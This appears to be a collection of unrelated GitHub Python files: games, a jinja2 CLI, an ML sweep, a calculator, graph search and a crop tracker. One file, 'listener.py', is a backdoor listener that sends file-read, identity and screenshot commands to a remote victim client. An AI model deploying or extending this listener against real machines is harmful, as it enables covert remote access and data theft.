range(size)]\r\nboardWidth=1\r\n\r\n#定顏色\r\nfcolor=colored.fg(\"black\")\r\nbcolor=colored.bg(\"white\")\r\nreset=colored.attr(\"reset\")\r\nmarkedcolor=colored.bg(\"orange_1\")\r\n\r\nboardSpaceAmount=size**2\r\nprint(f\"boardSpaceAmount:{boardSpaceAmount}\")\r\nprintBoard(board,boardWidth)\r\n#循環進行遊戲\r\nwhile 1:\r\n #玩家下棋\r\n player()\r\n boardSpaceAmount-=1\r\n clear()\r\n printBoard(board,boardWidth)\r\n positions=DeepCheck(1,True)#檢查是否有人贏了\r\n \r\n\r\n \r\n #訂定AI搜尋深度\r\n CheckDepth=int(-0.05 * boardSpaceAmount +k)#k==7or6,由設定的難度所決定\r\n if CheckDepth<1:\r\n \tCheckDepth=1\r\n print(f\"CheckDepth : {CheckDepth}\")\r\n #AI下棋\r\n print(\"loading...\")\r\n positions=DeepCheck(CheckDepth,False)\r\n clear()\r\n board=ai(positions,board)\r\n boardSpaceAmount-=1\r\n printBoard(board,boardWidth)\r\n positions=DeepCheck(1,True)#檢查是否有人贏了\r\n","repo_name":"Forever-CodingNoob/gomoku","sub_path":"minimax_fixed_colored_alpha.py","file_name":"minimax_fixed_colored_alpha.py","file_ext":"py","file_size_in_byte":19276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41686385457","text":"import sys\nimport yaml\nimport jinja2\n\ndef main():\n templateFile, configFiles = parse_args()\n with open(templateFile, \"r\") as fh:\n templateStr = fh.read()\n template = jinja2.Template(templateStr)\n configData = build_config(configFiles)\n sys.stdout.write(template.render(configData))\n\ndef parse_args():\n template = None\n configs = []\n argCount = len(sys.argv)\n i = 1\n while i < argCount:\n a = sys.argv[i]\n if a == \"-\":\n a = \"/dev/stdin\"\n if a.startswith(\"-\"):\n raise Exception(f\"Unknown option: {a}\")\n elif template == None:\n template = a\n else:\n configs.append(a)\n i += 1\n return [template, configs]\n\ndef build_config(config_files):\n result = {}\n for f in config_files:\n with open(f, \"r\") as fh:\n config = yaml.safe_load(fh.read())\n for key, value in config.items():\n result[key] = value\n return result\n\n","repo_name":"suzuki-navi/j2cli5","sub_path":"j2cli5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6203706553","text":"import numpy as np\nfrom baselines.baseline_gpy import run\nimport warnings\nfrom tqdm import tqdm\nwarnings.filterwarnings(\"ignore\")\n\n\ndef baseline(n, dims, lr, iters, approx, noise, batch_size = 512):\n rewards, lengths, peaks = run(n, dims, lr, iters, approx, noise, batch_size = batch_size)\n n = len(peaks)\n reward_avg = sum(rewards)/n\n length_avg = sum(lengths)/n\n peak_avg = sum(peaks)/n\n\n reward_std = round(np.std(rewards)/np.sqrt(n), 4)\n length_std = round(np.std(lengths)/np.sqrt(n), 4)\n peak_std = round(np.std(peaks)/np.sqrt(n), 4)\n \n print(f\"\\tReward: {round(reward_avg, 4)} ± {reward_std}, Length: {round(length_avg, 4)} ± {length_std}, Peak: {round(peak_avg, 4)} ± {peak_std}\")\n\n return reward_avg, length_avg, peak_avg\n\n\nbest_peak = -np.inf\nbest_length = None\nbest_reward = None\nbest_params = None\n\nlrs = [0.1, 0.01]\ntraining_iters = [25, 50, 100, 200]\napproxs = [True, False]\nnoises = [None, 0.1, 0.00001]\n\nlr_dict = {lr: [] for lr in lrs}\niter_dict = {iters: [] for iters in training_iters}\napprox_dict = {approx: [] for approx in approxs}\nnoise_dict = {noise: [] for noise in noises}\n\n\n#Too low? Okay I s'pose\nn = 5000\ndims = 2\nbatch_size = 1024\n\nfor lr in lrs:\n for iters in training_iters:\n for approx in approxs:\n for noise in noises:\n print(f\"Learning rate: {lr} Iterations: {iters} Approx: {approx} Noise: {noise}\")\n reward, length, peak = baseline(n, dims, lr, iters, approx, noise, batch_size)\n print(\"\\n\")\n if peak > best_peak:\n best_length = length\n best_reward = reward\n best_peak = peak\n best_params = {\"lr\":lr, \"iters\": iters, \"approx\": approx}\n lr_dict[lr].append(peak)\n iter_dict[iters].append(peak)\n approx_dict[approx].append(peak)\n noise_dict[noise].append(peak)\n \nprint(\"\\n\")\nprint(\"Averages:\\n\")\nprint(\"Leaning rate:\")\nfor lr, peaks in lr_dict.items():\n print(f\"\\tLearning rate: {lr} Average: {round(np.mean(peaks), 4)}\")\n\nprint(\"Training iterations:\")\nfor iters, peaks in iter_dict.items():\n print(f\"\\tTraining iterations: {iters} Average: {round(np.mean(peaks), 4)}\")\n\nprint(\"Approx:\")\nfor approx, peaks in approx_dict.items():\n print(f\"\\tApprox: {approx} Average: {round(np.mean(peaks), 4)}\")\n\nprint(\"Noise:\")\nfor noise, peaks in noise_dict.items():\n print(f\"\\tNoise: {noise} Average: {round(np.mean(peaks), 4)}\")\n\n\nprint(\"\\n\\n\")\n\nprint(\"Best params:\")\nprint(f\"\\tLearning rate: {best_params['lr']} Iterations: {best_params['iters']} Approx: {best_params['approx']} Noise: {best_params['noise']}\")\nprint(f\"\\tReward: {round(best_reward, 4)} Length: {round(best_length, 4)} Peak: {round(best_peak, 4)}\")","repo_name":"ALjone/Master-Thesis","sub_path":"hyperparameter_optimization_gpy.py","file_name":"hyperparameter_optimization_gpy.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5757107244","text":"task_name = \"ride\"\n\n\n\"\"\"\nID: alexand185\nLANG: PYTHON3\nTASK: ride\n\"\"\"\nfin = open ('{}.in'.format(task_name), 'r')\nfout = open ('{}.out'.format(task_name), 'w')\ninput = fin.readline\nfirst = input()\nnba = 1\nfor char in first: nba *= ord(char)-64\nsecond = input()\nnbb = 1\nfor char in second: nbb *= ord(char)-64\n\nif nba%47 == nbb%47:\n\tfout.write(\"GO\")\nelse:\n\tfout.write(\"STAY\")\n\nfout.write(\"\\n\")\n\n\nfout.close()","repo_name":"Epigone-Alex/Algo","sub_path":"2_USACOTRAINING.py","file_name":"2_USACOTRAINING.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38545377364","text":"# MISC FUNCTIONS\r\ndef deformatter( num ):\r\n deformatted = \"\"\r\n\r\n for i in num:\r\n if not ( i.isspace() or i == \",\" ):\r\n deformatted += i\r\n \r\n return deformatted\r\n\r\ndef formatter( number, dig ):\r\n num = deformatter( str( number ) )\r\n num_r = num[-1 : : -1]\r\n if( dig == 2 or dig == 16 ): grp = 4\r\n elif( dig == 8 or dig == 10 ): grp = 3\r\n\r\n formated = \"\"\r\n counter = 1\r\n for i in num_r:\r\n if ( counter <= grp ): \r\n formated += i\r\n counter += 1\r\n else: \r\n if( dig == 10 ): formated += \",\"\r\n else: formated += \" \"\r\n\r\n formated += i\r\n counter = 1\r\n \r\n return formated[-1 : : -1]\r\n\r\n# CONVERSION FUNCTIONS\r\ndef al_num( num ):\r\n dic_n = { 10 : \"A\", 11 : \"B\", 12 : \"C\", 13 : \"D\", 14 : \"E\", 15 : \"F\" }\r\n dic = { \"A\" : 10, \"B\" : 11, \"C\" : 12, \"D\" : 13, \"E\" : 14, \"F\" : 15 }\r\n \r\n if( num in dic ): result = str( dic[num] ) \r\n \r\n if( num in dic_n ): result = str( dic_n[num] )\r\n \r\n return result\r\n\r\ndef any_dec( number, dig, power ):\r\n num = deformatter( str( number ) )\r\n if ( num == \"\" ): return 0\r\n \r\n if( num[-1].isnumeric() ): result = int( num[-1] )\r\n else: result = int( al_num(num[-1] ) )\r\n \r\n return ( result ) * ( dig ** power ) + any_dec( num[0 : -1], dig, power + 1 )\r\n\r\ndef decany( num, dig ):\r\n if( num == 0 ): return \"0\"\r\n elif( num == 1 ): return \"1\"\r\n\r\n if( dig == 16 and ( num % dig ) > 9 ): result = al_num( num % dig )\r\n else: result = str( num % dig )\r\n\r\n return result + str( decany( num // dig, dig ) )\r\n\r\ndef dec_any( number, dig ):\r\n num = int ( deformatter( str ( number ) ) )\r\n\r\n temp_result = decany( num, dig )\r\n result = temp_result[-1: : -1]\r\n \r\n if not ( result[0] == \"0\" ): return result\r\n else: return result[1:]\r\n\r\n# ARITHMETIC FUNCTIONS\r\ndef arithmetic( num1, num2, op ):\r\n if( op == \"+\" ): return int( num1 ) + int( num2 )\r\n elif( op == \"-\" ): return int( num1 ) - int( num2 )\r\n elif( op == \"x\" ): return int( num1 ) * int( num2 )\r\n elif( op == \"/\" ): return int( num1 ) / int( num2 ) \r\n\r\n# EXTRAS\r\n\"\"\"\r\ndef negative( num, carry ):\r\n if( num == 0 and carry == 1): return \"1\" \r\n a = ( num % 10 ) + carry\r\n if( a == 0 ): b = c = 0\r\n elif( a == 1 ): \r\n b = 1\r\n c = 0\r\n elif( a == 2 ): \r\n b = 0 \r\n c = 1\r\n return str( b ) + negative( num // 10, c )\r\n\"\"\"","repo_name":"Atharva-Gondhali/Basic-Programmer-Calculator","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72836994435","text":"#this if for a 10x20 game grid\n\nclass GamePiece:\n tile_roots = {\"I\": (0, 0), \"O\": (1, 1), \"S\": (1, 0), \"Z\": (-1, -1), \"L\": (0, 0), \"J\": (0, 1), \"T\": (0, 0)}\n \n tiles = {\"O\": [[4, 14, 15, 5]], \n \"I\": [[4, 14, 24, 34], [3, 4, 5, 6]],\n \"S\": [[5, 4, 14, 13], [4, 14, 15, 25]], \n \"Z\": [[4, 5, 15, 16], [5, 15, 14, 24]], \n \"L\": [[4, 14, 24, 25], [5, 15, 14, 13], [4, 5, 15, 25], [6, 5, 4, 14]], \n \"J\": [[5, 15, 25, 24], [15, 5, 4, 3], [5, 4, 14, 24], [4, 14, 15, 16]], \n \"T\": [[4, 14, 24, 15], [4, 13, 14, 15], [5, 15, 25, 14], [4, 5, 6, 15]]}\n valid_tiles = [\"O\", \"I\", \"S\", \"Z\", \"L\", \"J\", \"T\"]\n\n\n def __init__(self, tile_name, board_y, board_x):\n self.positions = []\n self.size = 0\n self.index = 0\n self.create_piece(tile_name, board_y, board_x)\n\n \n def get_root_tuple(self, tile_name, board_y, board_x):\n if tile_name not in GamePiece.valid_tiles:\n raise ValueError(\"Invalid tile name\")\n return GamePiece.tiles[tile_name][0][0] + (board_y * 10) + board_x\n\n\n def create_piece(self, tile_name, board_y, board_x):\n if tile_name not in GamePiece.valid_tiles:\n raise ValueError(\"Invalid tile name\") \n self.positions = self.modify_positions(GamePiece.tiles[tile_name], board_y - 20, board_x - 10)\n self.size = len(self.positions)\n self.index = 0\n\n\n def modify_positions(self, positions, board_y, board_x):\n for i in range(len(positions)):\n positions[i] += (board_y * 10) + board_x\n return positions\n\n\n def get_current_position(self):\n return self.positions[self.index]\n\n\n def rotate(self):\n self.index += 1\n if self.index == self.size:\n self.index = 0\n \n\n def move_position(self, movecode):\n if movecode == \"left\":\n self.move_left()\n elif movecode == \"right\":\n self.move_right()\n elif movecode == \"down\":\n self.move_down()\n else:\n raise ValueError(\"Invalid move code\")\n\n\n def move_left(self):\n for i in range(len(self.positions)):\n for j in range(len(self.positions[i])):\n #move to other side if it goes off the board\n if self.positions[i][j] % 10 == 0:\n self.positions[i][j] += 9\n else:\n self.positions[i][j] -= 1\n \n \n def move_right(self):\n for i in range(len(self.positions)):\n for j in range(len(self.positions[i])):\n #move to other side if it goes off the board\n if self.positions[i][j] % 10 == 9:\n self.positions[i][j] -= 9\n else:\n self.positions[i][j] += 1\n\n\n def move_down(self):\n for i in range(len(self.positions)):\n for j in range(len(self.positions[i])):\n #return to top if it goes off the board\n if self.positions[i][j] >= 190:\n self.positions[i][j] -= 190\n else:\n self.positions[i][j] += 10\n\n\n\n\n","repo_name":"akareen/Jetbrains-Academy-Python-Track","sub_path":"3. Hard Projects/Tetris/game_piece.py","file_name":"game_piece.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38272242841","text":"#!/usr/bin/env python\n# license removed for brevity\n\nimport rospy\n\n#graph = {'livingroom-01': ['door-01', 'door-02', 'door-03', 'door-04', 'door-05'],\n# 'corridor-01': ['door-01'],\n# 'bedroom-01': ['door-02'],\n#\t 'bedroom-02': ['door-03'],\n# 'kitchen-01': ['door-04'],}\n\ngraph = {'livingroom-01': ['door-01', 'door-02', 'door-03', 'door-04', 'door-05'],\n 'door-01': ['corridor-01'],\n 'door-02': ['bedroom-01'],\n 'door-03': ['bedroom-02'],\n 'door-04': ['kitchen-01'],\n 'door-05': ['kitchen-01', 'bedroom-02']}\n\n\n\ndef find_shortest_path(graph, start, end, path=[]):\n path = path + [start]\n \n if start == end:\n return path\n \n if not graph.has_key(start):\n return None\n shortest = None\n \n for node in graph[start]:\n if node not in path:\n newpath = find_shortest_path(graph, node, end, path)\n if newpath:\n if not shortest or len(newpath) < len(shortest):\n shortest = newpath\n return shortest \n\n\nif __name__ == '__main__': \n path = find_shortest_path(graph, 'livingroom-01', 'corridor-01')\n\n for value in path:\n print(value)\n","repo_name":"ndeshp2s/inria_hbrs","sub_path":"semantic_navigation/knowledge_base/topological_map/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18149929307","text":"import sys\nsys.stdin = open('input.txt', \"r\")\n\nA,B = map(int, sys.stdin.readline().rstrip().split())\ndef solution(n :int) -> int:\n cnt = 1\n answer = n\n while ((1< \"Binding\":\n km: \"HydraKernelManager\" = self.parent\n assert hasattr(km, \"binding\")\n return km.binding\n\n async def kill(self, restart: bool = False) -> None:\n await self.send_signal(int(signal.SIGKILL))\n\n async def terminate(self, restart: bool = False) -> None:\n await self.send_signal(int(signal.SIGTERM))\n\n async def wait(self) -> \"Optional[int]\":\n ret = 0\n if self.has_process:\n while await self.poll() is None:\n await asyncio.sleep(self.poll_interval)\n\n self.reset()\n return ret\n\n async def cleanup(self, restart: bool = False) -> None:\n \"\"\"No-op cleanup default implementation to satisfy base class.\"\"\"\n pass\n\n def reset(self) -> None:\n \"\"\"Reset the has_process state.\n\n In general, this function should modify the state of the provisioner\n such that has_process returns false.\n \"\"\"\n pass\n\n\nclass FileManagementMixin:\n async def upload_path(self, local_path: \"str\", remote_path: \"str\" = None):\n raise NotImplementedError(\"Upload is not supported for this subkernel.\")\n\n async def download_path(self, remote_path: \"str\", local_path: \"str\" = None):\n raise NotImplementedError(\"Download is not supported for this subkernel.\")\n\n def prepare_upload(self, local_path: \"str\"):\n fd = io.BytesIO()\n path = pathlib.Path(local_path)\n arcname = \".\" if path.is_dir() else None\n\n with tarfile.open(fileobj=fd, mode=\"w:gz\") as tar:\n tar.add(local_path, arcname=arcname)\n fd.seek(0)\n\n return fd\n","repo_name":"ChameleonCloud/jupyterlab-chameleon","sub_path":"hydra_kernel/provisioning/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23579247761","text":"t = int(input())\r\n\r\nfor z in range(t):\r\n d,n=[int(n) for n in (input().split(' '))]\r\n ks=[]\r\n for y in range(n):\r\n kt,st=[int(n) for n in input().split(' ')]\r\n ks.append([kt,st])\r\n time=0\r\n td=0\r\n for x in ks:\r\n td = x[0] +x[1]*time\r\n if td>d:\r\n continue\r\n time = time + ((d-td)/x[1])\r\n r = (d/time)\r\n print (\"Case #{}: {}\".format(z+1,r))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/1489.py","file_name":"1489.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"743122100","text":"import sys\ndata = list()\nfor line in sys.stdin:\n data.append(line.split())\n\n\nnot_ruler = False\n\nbiggest = 0\nfor i in data:\n list1 = dict()\n for a in range(0, len(i) - 1):\n for b in range(a+1, len(i)):\n change = int(i[b])\n if change > biggest:\n biggest = change\n temp = abs(int(i[a])-int(i[b]))\n if temp not in list1.keys():\n list1[abs(int(i[a])-int(i[b]))] = 1\n else:\n not_ruler = True\n break\n if not_ruler is True:\n break\n\n if not_ruler is True:\n print(\"not a ruler\")\n not_ruler = False\n elif len(list1) == biggest and not_ruler is False:\n print(\"perfect\")\n elif len(list1) != biggest and not_ruler is False:\n print(\"missing\", end=\" \")\n for key in range(1, biggest):\n if key not in list1.keys():\n print(key, end=\" \")\n\n biggest = 0\n","repo_name":"DragonOfTheEast/kattisProblems","sub_path":"Golomb Rulers.py","file_name":"Golomb Rulers.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40872625611","text":"from menpofit.result import (ParametricIterativeResult,\n MultiScaleParametricIterativeResult)\n\n\nclass LucasKanadeAlgorithmResult(ParametricIterativeResult):\n r\"\"\"\n Class for storing the iterative result of a Lucas-Kanade Image Alignment\n optimization algorithm.\n\n Parameters\n ----------\n shapes : `list` of `menpo.shape.PointCloud`\n The `list` of shapes per iteration. The first and last members\n correspond to the initial and final shapes, respectively.\n homogeneous_parameters : `list` of ``(n_parameters,)`` `ndarray`\n The `list` of parameters of the homogeneous transform per iteration.\n The first and last members correspond to the initial and final\n shapes, respectively.\n initial_shape : `menpo.shape.PointCloud` or ``None``, optional\n The initial shape from which the fitting process started. If\n ``None``, then no initial shape is assigned.\n image : `menpo.image.Image` or `subclass` or ``None``, optional\n The image on which the fitting process was applied. Note that a copy\n of the image will be assigned as an attribute. If ``None``, then no\n image is assigned.\n gt_shape : `menpo.shape.PointCloud` or ``None``, optional\n The ground truth shape associated with the image. If ``None``, then no\n ground truth shape is assigned.\n costs : `list` of `float` or ``None``, optional\n The `list` of cost per iteration. If ``None``, then it is assumed that\n the cost function cannot be computed for the specific algorithm.\n \"\"\"\n def __init__(self, shapes, homogeneous_parameters, initial_shape=None,\n image=None, gt_shape=None, costs=None):\n super(LucasKanadeAlgorithmResult, self).__init__(\n shapes=shapes, shape_parameters=homogeneous_parameters,\n initial_shape=initial_shape, image=image, gt_shape=gt_shape,\n costs=costs)\n self._homogeneous_parameters = homogeneous_parameters\n\n @property\n def homogeneous_parameters(self):\n r\"\"\"\n Returns the `list` of parameters of the homogeneous transform\n obtained at each iteration of the fitting process. The `list`\n includes the parameters of the `initial_shape` (if it exists) and\n `final_shape`.\n\n :type: `list` of ``(n_params,)`` `ndarray`\n \"\"\"\n return self._shape_parameters\n\n\nclass LucasKanadeResult(MultiScaleParametricIterativeResult):\n r\"\"\"\n Class for storing the multi-scale iterative fitting result of an ATM. It\n holds the shapes, shape parameters and costs per iteration.\n\n Parameters\n ----------\n results : `list` of :map:`ATMAlgorithmResult`\n The `list` of optimization results per scale.\n scales : `list` or `tuple`\n The `list` of scale values per scale (low to high).\n affine_transforms : `list` of `menpo.transform.Affine`\n The list of affine transforms per scale that transform the shapes into\n the original image space.\n scale_transforms : `list` of `menpo.shape.Scale`\n The list of scaling transforms per scale.\n image : `menpo.image.Image` or `subclass` or ``None``, optional\n The image on which the fitting process was applied. Note that a copy\n of the image will be assigned as an attribute. If ``None``, then no\n image is assigned.\n gt_shape : `menpo.shape.PointCloud` or ``None``, optional\n The ground truth shape associated with the image. If ``None``, then no\n ground truth shape is assigned.\n \"\"\"\n def __init__(self, results, scales, affine_transforms, scale_transforms,\n image=None, gt_shape=None):\n super(LucasKanadeResult, self).__init__(\n results=results, scales=scales, affine_transforms=affine_transforms,\n scale_transforms=scale_transforms, image=image, gt_shape=gt_shape)\n # Create parameters list\n self._homogeneous_parameters = []\n for r in results:\n self._homogeneous_parameters += r.homogeneous_parameters\n # Correct n_iters\n self._n_iters -= len(scales)\n\n @property\n def homogeneous_parameters(self):\n r\"\"\"\n Returns the `list` of parameters of the homogeneous transform\n obtained at each iteration of the fitting process. The `list`\n includes the parameters of the `initial_shape` (if it exists) and\n `final_shape`.\n\n :type: `list` of ``(n_params,)`` `ndarray`\n \"\"\"\n return self._homogeneous_parameters\n\n @property\n def shape_parameters(self):\n # Use homogeneous_parameters instead.\n raise AttributeError\n","repo_name":"papulke/face-of-art","sub_path":"menpofit/lk/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"61"} +{"seq_id":"36921714947","text":"import socket\nimport os\nfrom colorama import Fore,Back,Style\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nhost = socket.gethostname()\nport = 4444\n\ns.bind((host,port))\ns.listen()\nprint(Fore.GREEN+\"[+] Listening mode on!\"+Fore.RESET)\nconn,addr = s.accept()\nprint(Fore.CYAN+f\"[+] Connected from {addr}\"+Fore.RESET)\n\ndef help_func():\n print(\"Available command list\")\n\n print(\"pwd\")\n print(\"ls\")\n print(\"id\")\n print(\"cat\")\n print(\"uname\")\n print(\"screenshot\")\n print(\"(Command line will be UPDATED!)\")\n print(\"\\n\")\nwhile True:\n cmd = input(str(\":$ \"))\n if cmd == \"help\":\n help_func()\n\n elif cmd == \"pwd\":\n conn.send(cmd.encode())\n data = conn.recv(5000)\n data = data.decode()\n print(data)\n \n elif cmd == \"ls\":\n conn.send(cmd.encode())\n path = input(str(\"$dir: \"))\n path = path.encode()\n conn.send(path)\n \n data = conn.recv(5000)\n data = data.decode()\n print(data)\n \n elif cmd == \"id\":\n conn.send(cmd.encode())\n data = conn.recv(5000)\n data = data.decode()\n print(data)\n\n elif cmd == \"uname\":\n conn.send(cmd.encode())\n data = conn.recv(5000)\n data = data.decode()\n print(data)\n\n\n elif cmd == \"cat\":\n conn.send(cmd.encode())\n\n f = input(str(\"$file: \"))\n f = f.encode()\n conn.send(f)\n \n data = conn.recv(5000)\n data = data.decode()\n print(data)\n elif cmd == \"screenshot\":\n conn.send(cmd.encode())\n img = open(\"backdoor_screen.jpg\",\"wb\")\n img_data = conn.recv(5000000)\n i = True\n while i:\n img.write(img_data)\n i = False\n \n else:\n print(Back.RED+\"[-] Command Not Found!\"+Back.RESET)\n \n","repo_name":"Gsss3/python-backdor","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70907905153","text":"\"\"\"\nImplements a tracker for corn crops using SORT algorithm.\n\nSORT is a simple, online and realtime tracking algorithm for 2D multiple\nobject tracking in video sequences. It works with bounding boxes.\n\"\"\"\n\nfrom typing import List, Tuple\n\nimport numpy as np\nimport numpy.typing as npt\nfrom filterpy.kalman import KalmanFilter\nfrom scipy.optimize import linear_sum_assignment\n\nfrom ts_semantic_feature_detector.features_3d.camera import StereoCamera\nfrom ts_semantic_feature_detector.features_3d.crop import CornCrop\nfrom ts_semantic_feature_detector.features_3d.sequence import AgriculturalSequence\n\nclass KalmanBoxTracker():\n \"\"\"\n Implements a bounding box tracker with Kalman filter.\n\n Attributes:\n crops (:obj:`list`): a list of :obj:`features_3d.crop.CornCrop`\n that this tracker refers to.\n \"\"\"\n\n count = 0\n \"\"\"\n int: static attribute to give unique ID's to the trackers.\n \"\"\"\n\n def __init__(\n self,\n crop: CornCrop\n ):\n \"\"\"\n Initialize a box tracker.\n\n TODO: update documentation about the state and action vectors.\n\n Args:\n crop (:obj:`features_3d.crop.CornCrop`): the object containing\n information about a single corn crop.\n \"\"\"\n self.kf = KalmanFilter(dim_x=7, dim_z=6, dim_u=2)\n\n # State transition matrix.\n self.kf.F = np.array([\n [1, 0, 0, 0, 1, 0, 0],\n [0, 1, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 0, 0, 1],\n [0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1]\n ])\n\n # Control transition matrix.\n self.kf.B = np.array([\n [0, 0],\n [0, 0],\n [0, 0],\n [0, 0],\n [1, 0],\n [0, 1],\n [0, 0]\n ])\n\n # Measurement function.\n self.kf.H = np.array([\n [1, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0]\n ])\n\n # Process noise \n self.kf.Q[:, :] *= 1e6\n\n # Measurement noise\n # Trust a lot position and displacement of matched detections.\n self.kf.R *= 10e-6\n # self.kf.R[:2, :2] *= 10e-3\n # self.kf.R[4:-1, 4:-1] *= 10e-3\n # Do not trust scale and ratio changes too much (original implementation).\n # self.kf.R[2:4,2:4] *= 10.\n # self.kf.R[-1, -1] *= 10.\n\n # Covariance matrix\n self.kf.P[-1, -1] *= 1000. # High uncertainty to scale velocity.\n self.kf.P *= 10.\n \n self.kf.x[:4] = self._convert_bbox_to_z(crop.crop_box.data)\n self.time_since_update = 0\n self.id = KalmanBoxTracker.count\n KalmanBoxTracker.count += 1\n self.history = []\n self.hits = 0\n self.hit_streak = 0\n self.age = 0\n\n # Change crop cluster.\n self.crops = []\n self.crops.append(crop)\n self.crops[-1].cluster = self.id\n\n def _convert_bbox_to_z(\n self,\n bbox: npt.ArrayLike\n ) -> npt.ArrayLike:\n \"\"\"\n Converts a bounding box in format [x1, y1, x2, y2] into [x, y, s, r].\n\n The [x1, y1, x2, y2] is segmentation model output format for bounding\n boxes, where (x1, y1) describes the top-left point and (x2, y2) the\n bottom-right point. The [x, y, s, r] is the Kalman filter format, where\n (x, y) describes the bounding box center coordinates, s is the bounding\n box area and r is bounding box size ratio.\n\n Args:\n bbox: (:obj:`np.ndarray`): containing the crop bounding box.\n\n Returns:\n converted_data (:obj:`np.ndarray`): the bouding box data converted.\n \"\"\"\n w = bbox[2] - bbox[0]\n h = bbox[3] - bbox[1]\n x = bbox[0] + w/2.\n y = bbox[1] + h/2.\n s = w * h\n r = w / float(h)\n\n if len(bbox) > 4:\n return np.array([x, y, s, r, bbox[4], bbox[5]]).reshape((6, 1))\n else:\n return np.array([x, y, s, r]).reshape((4, 1))\n \n def _convert_x_to_bbox(\n self,\n x: List,\n score: float = None\n ) -> npt.ArrayLike:\n \"\"\"\n Converts a bounding box in format [x, y, s, r] into [x1, y1, x2, y2].\n\n The [x1, y1, x2, y2] is segmentation model output format for bounding\n boxes, where (x1, y1) describes the top-left point and (x2, y2) the\n bottom-right point. The [x, y, s, r] is the Kalman filter format, where\n (x, y) describes the bounding box center coordinates, s is the bounding\n box area and r is bounding box size ratio.\n\n Args:\n x (:obj:`list`): containing the bounding box data.\n score (float, optional): containing the detection score.\n\n Returns:\n converted_data (:obj:`np.ndarray`): the bouding box data converted.\n \"\"\"\n w = np.sqrt(x[2] * x[3])\n h = x[2] / w\n if(score==None):\n return np.array([x[0]-w/2.,x[1]-h/2.,x[0]+w/2.,x[1]+h/2.]).reshape((1,4))\n else:\n return np.array([x[0]-w/2.,x[1]-h/2.,x[0]+w/2.,x[1]+h/2.,score]).reshape((1,5))\n\n def predict(\n self,\n motion_2d_offset: npt.ArrayLike\n ) -> npt.ArrayLike:\n \"\"\"\n Executes the Kalman filter predict step.\n\n Args:\n motion_2d_offset: a :obj:`np.ndarray` containing the 2D motion offset\n calculated from the extrinsics information.\n\n Returns:\n prediction (:obj:`np.ndarray`): the predicted bounding box.\n \"\"\"\n\n # Checks if the new predicted scale will be zero.\n # If yes, ignores the scale improvement.\n if((self.kf.x[4] + self.kf.x[2]) <= 0):\n self.kf.x[4] *= 0.0\n\n # Advances the state vector informing the motion offset\n # as the control action.\n self.kf.predict(motion_2d_offset)\n self.age += 1\n\n # Updates the time information\n if self.time_since_update > 0:\n self.hit_streak = 0\n self.time_since_update += 1\n\n self.history.append(\n self._convert_x_to_bbox(self.kf.x)\n )\n\n return self.history[-1]\n \n def update(\n self,\n detection: npt.ArrayLike\n ) -> None:\n \"\"\"\n Executes the Kalman filter correction step.\n\n Args:\n detection (:obj:`np.ndarray`): the detected bounding box\n in format [x1, y1, x2, y2].\n \"\"\"\n\n self.time_since_update = 0\n self.history = []\n self.hits += 1\n self.hit_streak += 1\n self.kf.update(self._convert_bbox_to_z(detection))\n\n def get_state(\n self\n ) -> npt.ArrayLike:\n \"\"\"\n Get the current bounding box estimate.\n\n Returns:\n state (:obj:`np.ndarray`): the current bounding box estimate.\n \"\"\"\n return self._convert_x_to_bbox(self.kf.x)\n\nclass AgricultureSort():\n \"\"\"\n Modified SORT: A Simple, Online and Realtime Tracker.\n\n Attributes:\n camera (features_3d.camera.StereoCamera): the camera object that\n contains all the stereo camera information to project 3D points\n back into the 2D plane.\n max_age (int): the maximum number of frames to keep alive a track \n without associated detections.\n min_hits (int): the minimum number of associated detections before\n track is initialised.\n iou_threshold (float): the minimum IOU for match.\n trackers (:obj:`list`): a list of :obj:`AgricultureTracker` objects.\n frame_count (int): the current frame number.\n \"\"\"\n def __init__(\n self,\n camera: StereoCamera,\n max_age = 1,\n min_hits = 3,\n iou_threshold = 0.3\n ):\n \"\"\"\n Initialize the SORT object.\n\n Args:\n camera (features_3d.camera.StereoCamera): the camera object that\n contains all stereo camera information to project 3D points \n back into the 2D plane.\n max_age (int, optional): the maximum number of frames to keep alive \n a track without associated detections.\n min_hits (int, optional): the minimum number of associated detections\n before track is initialised.\n iou_threshold 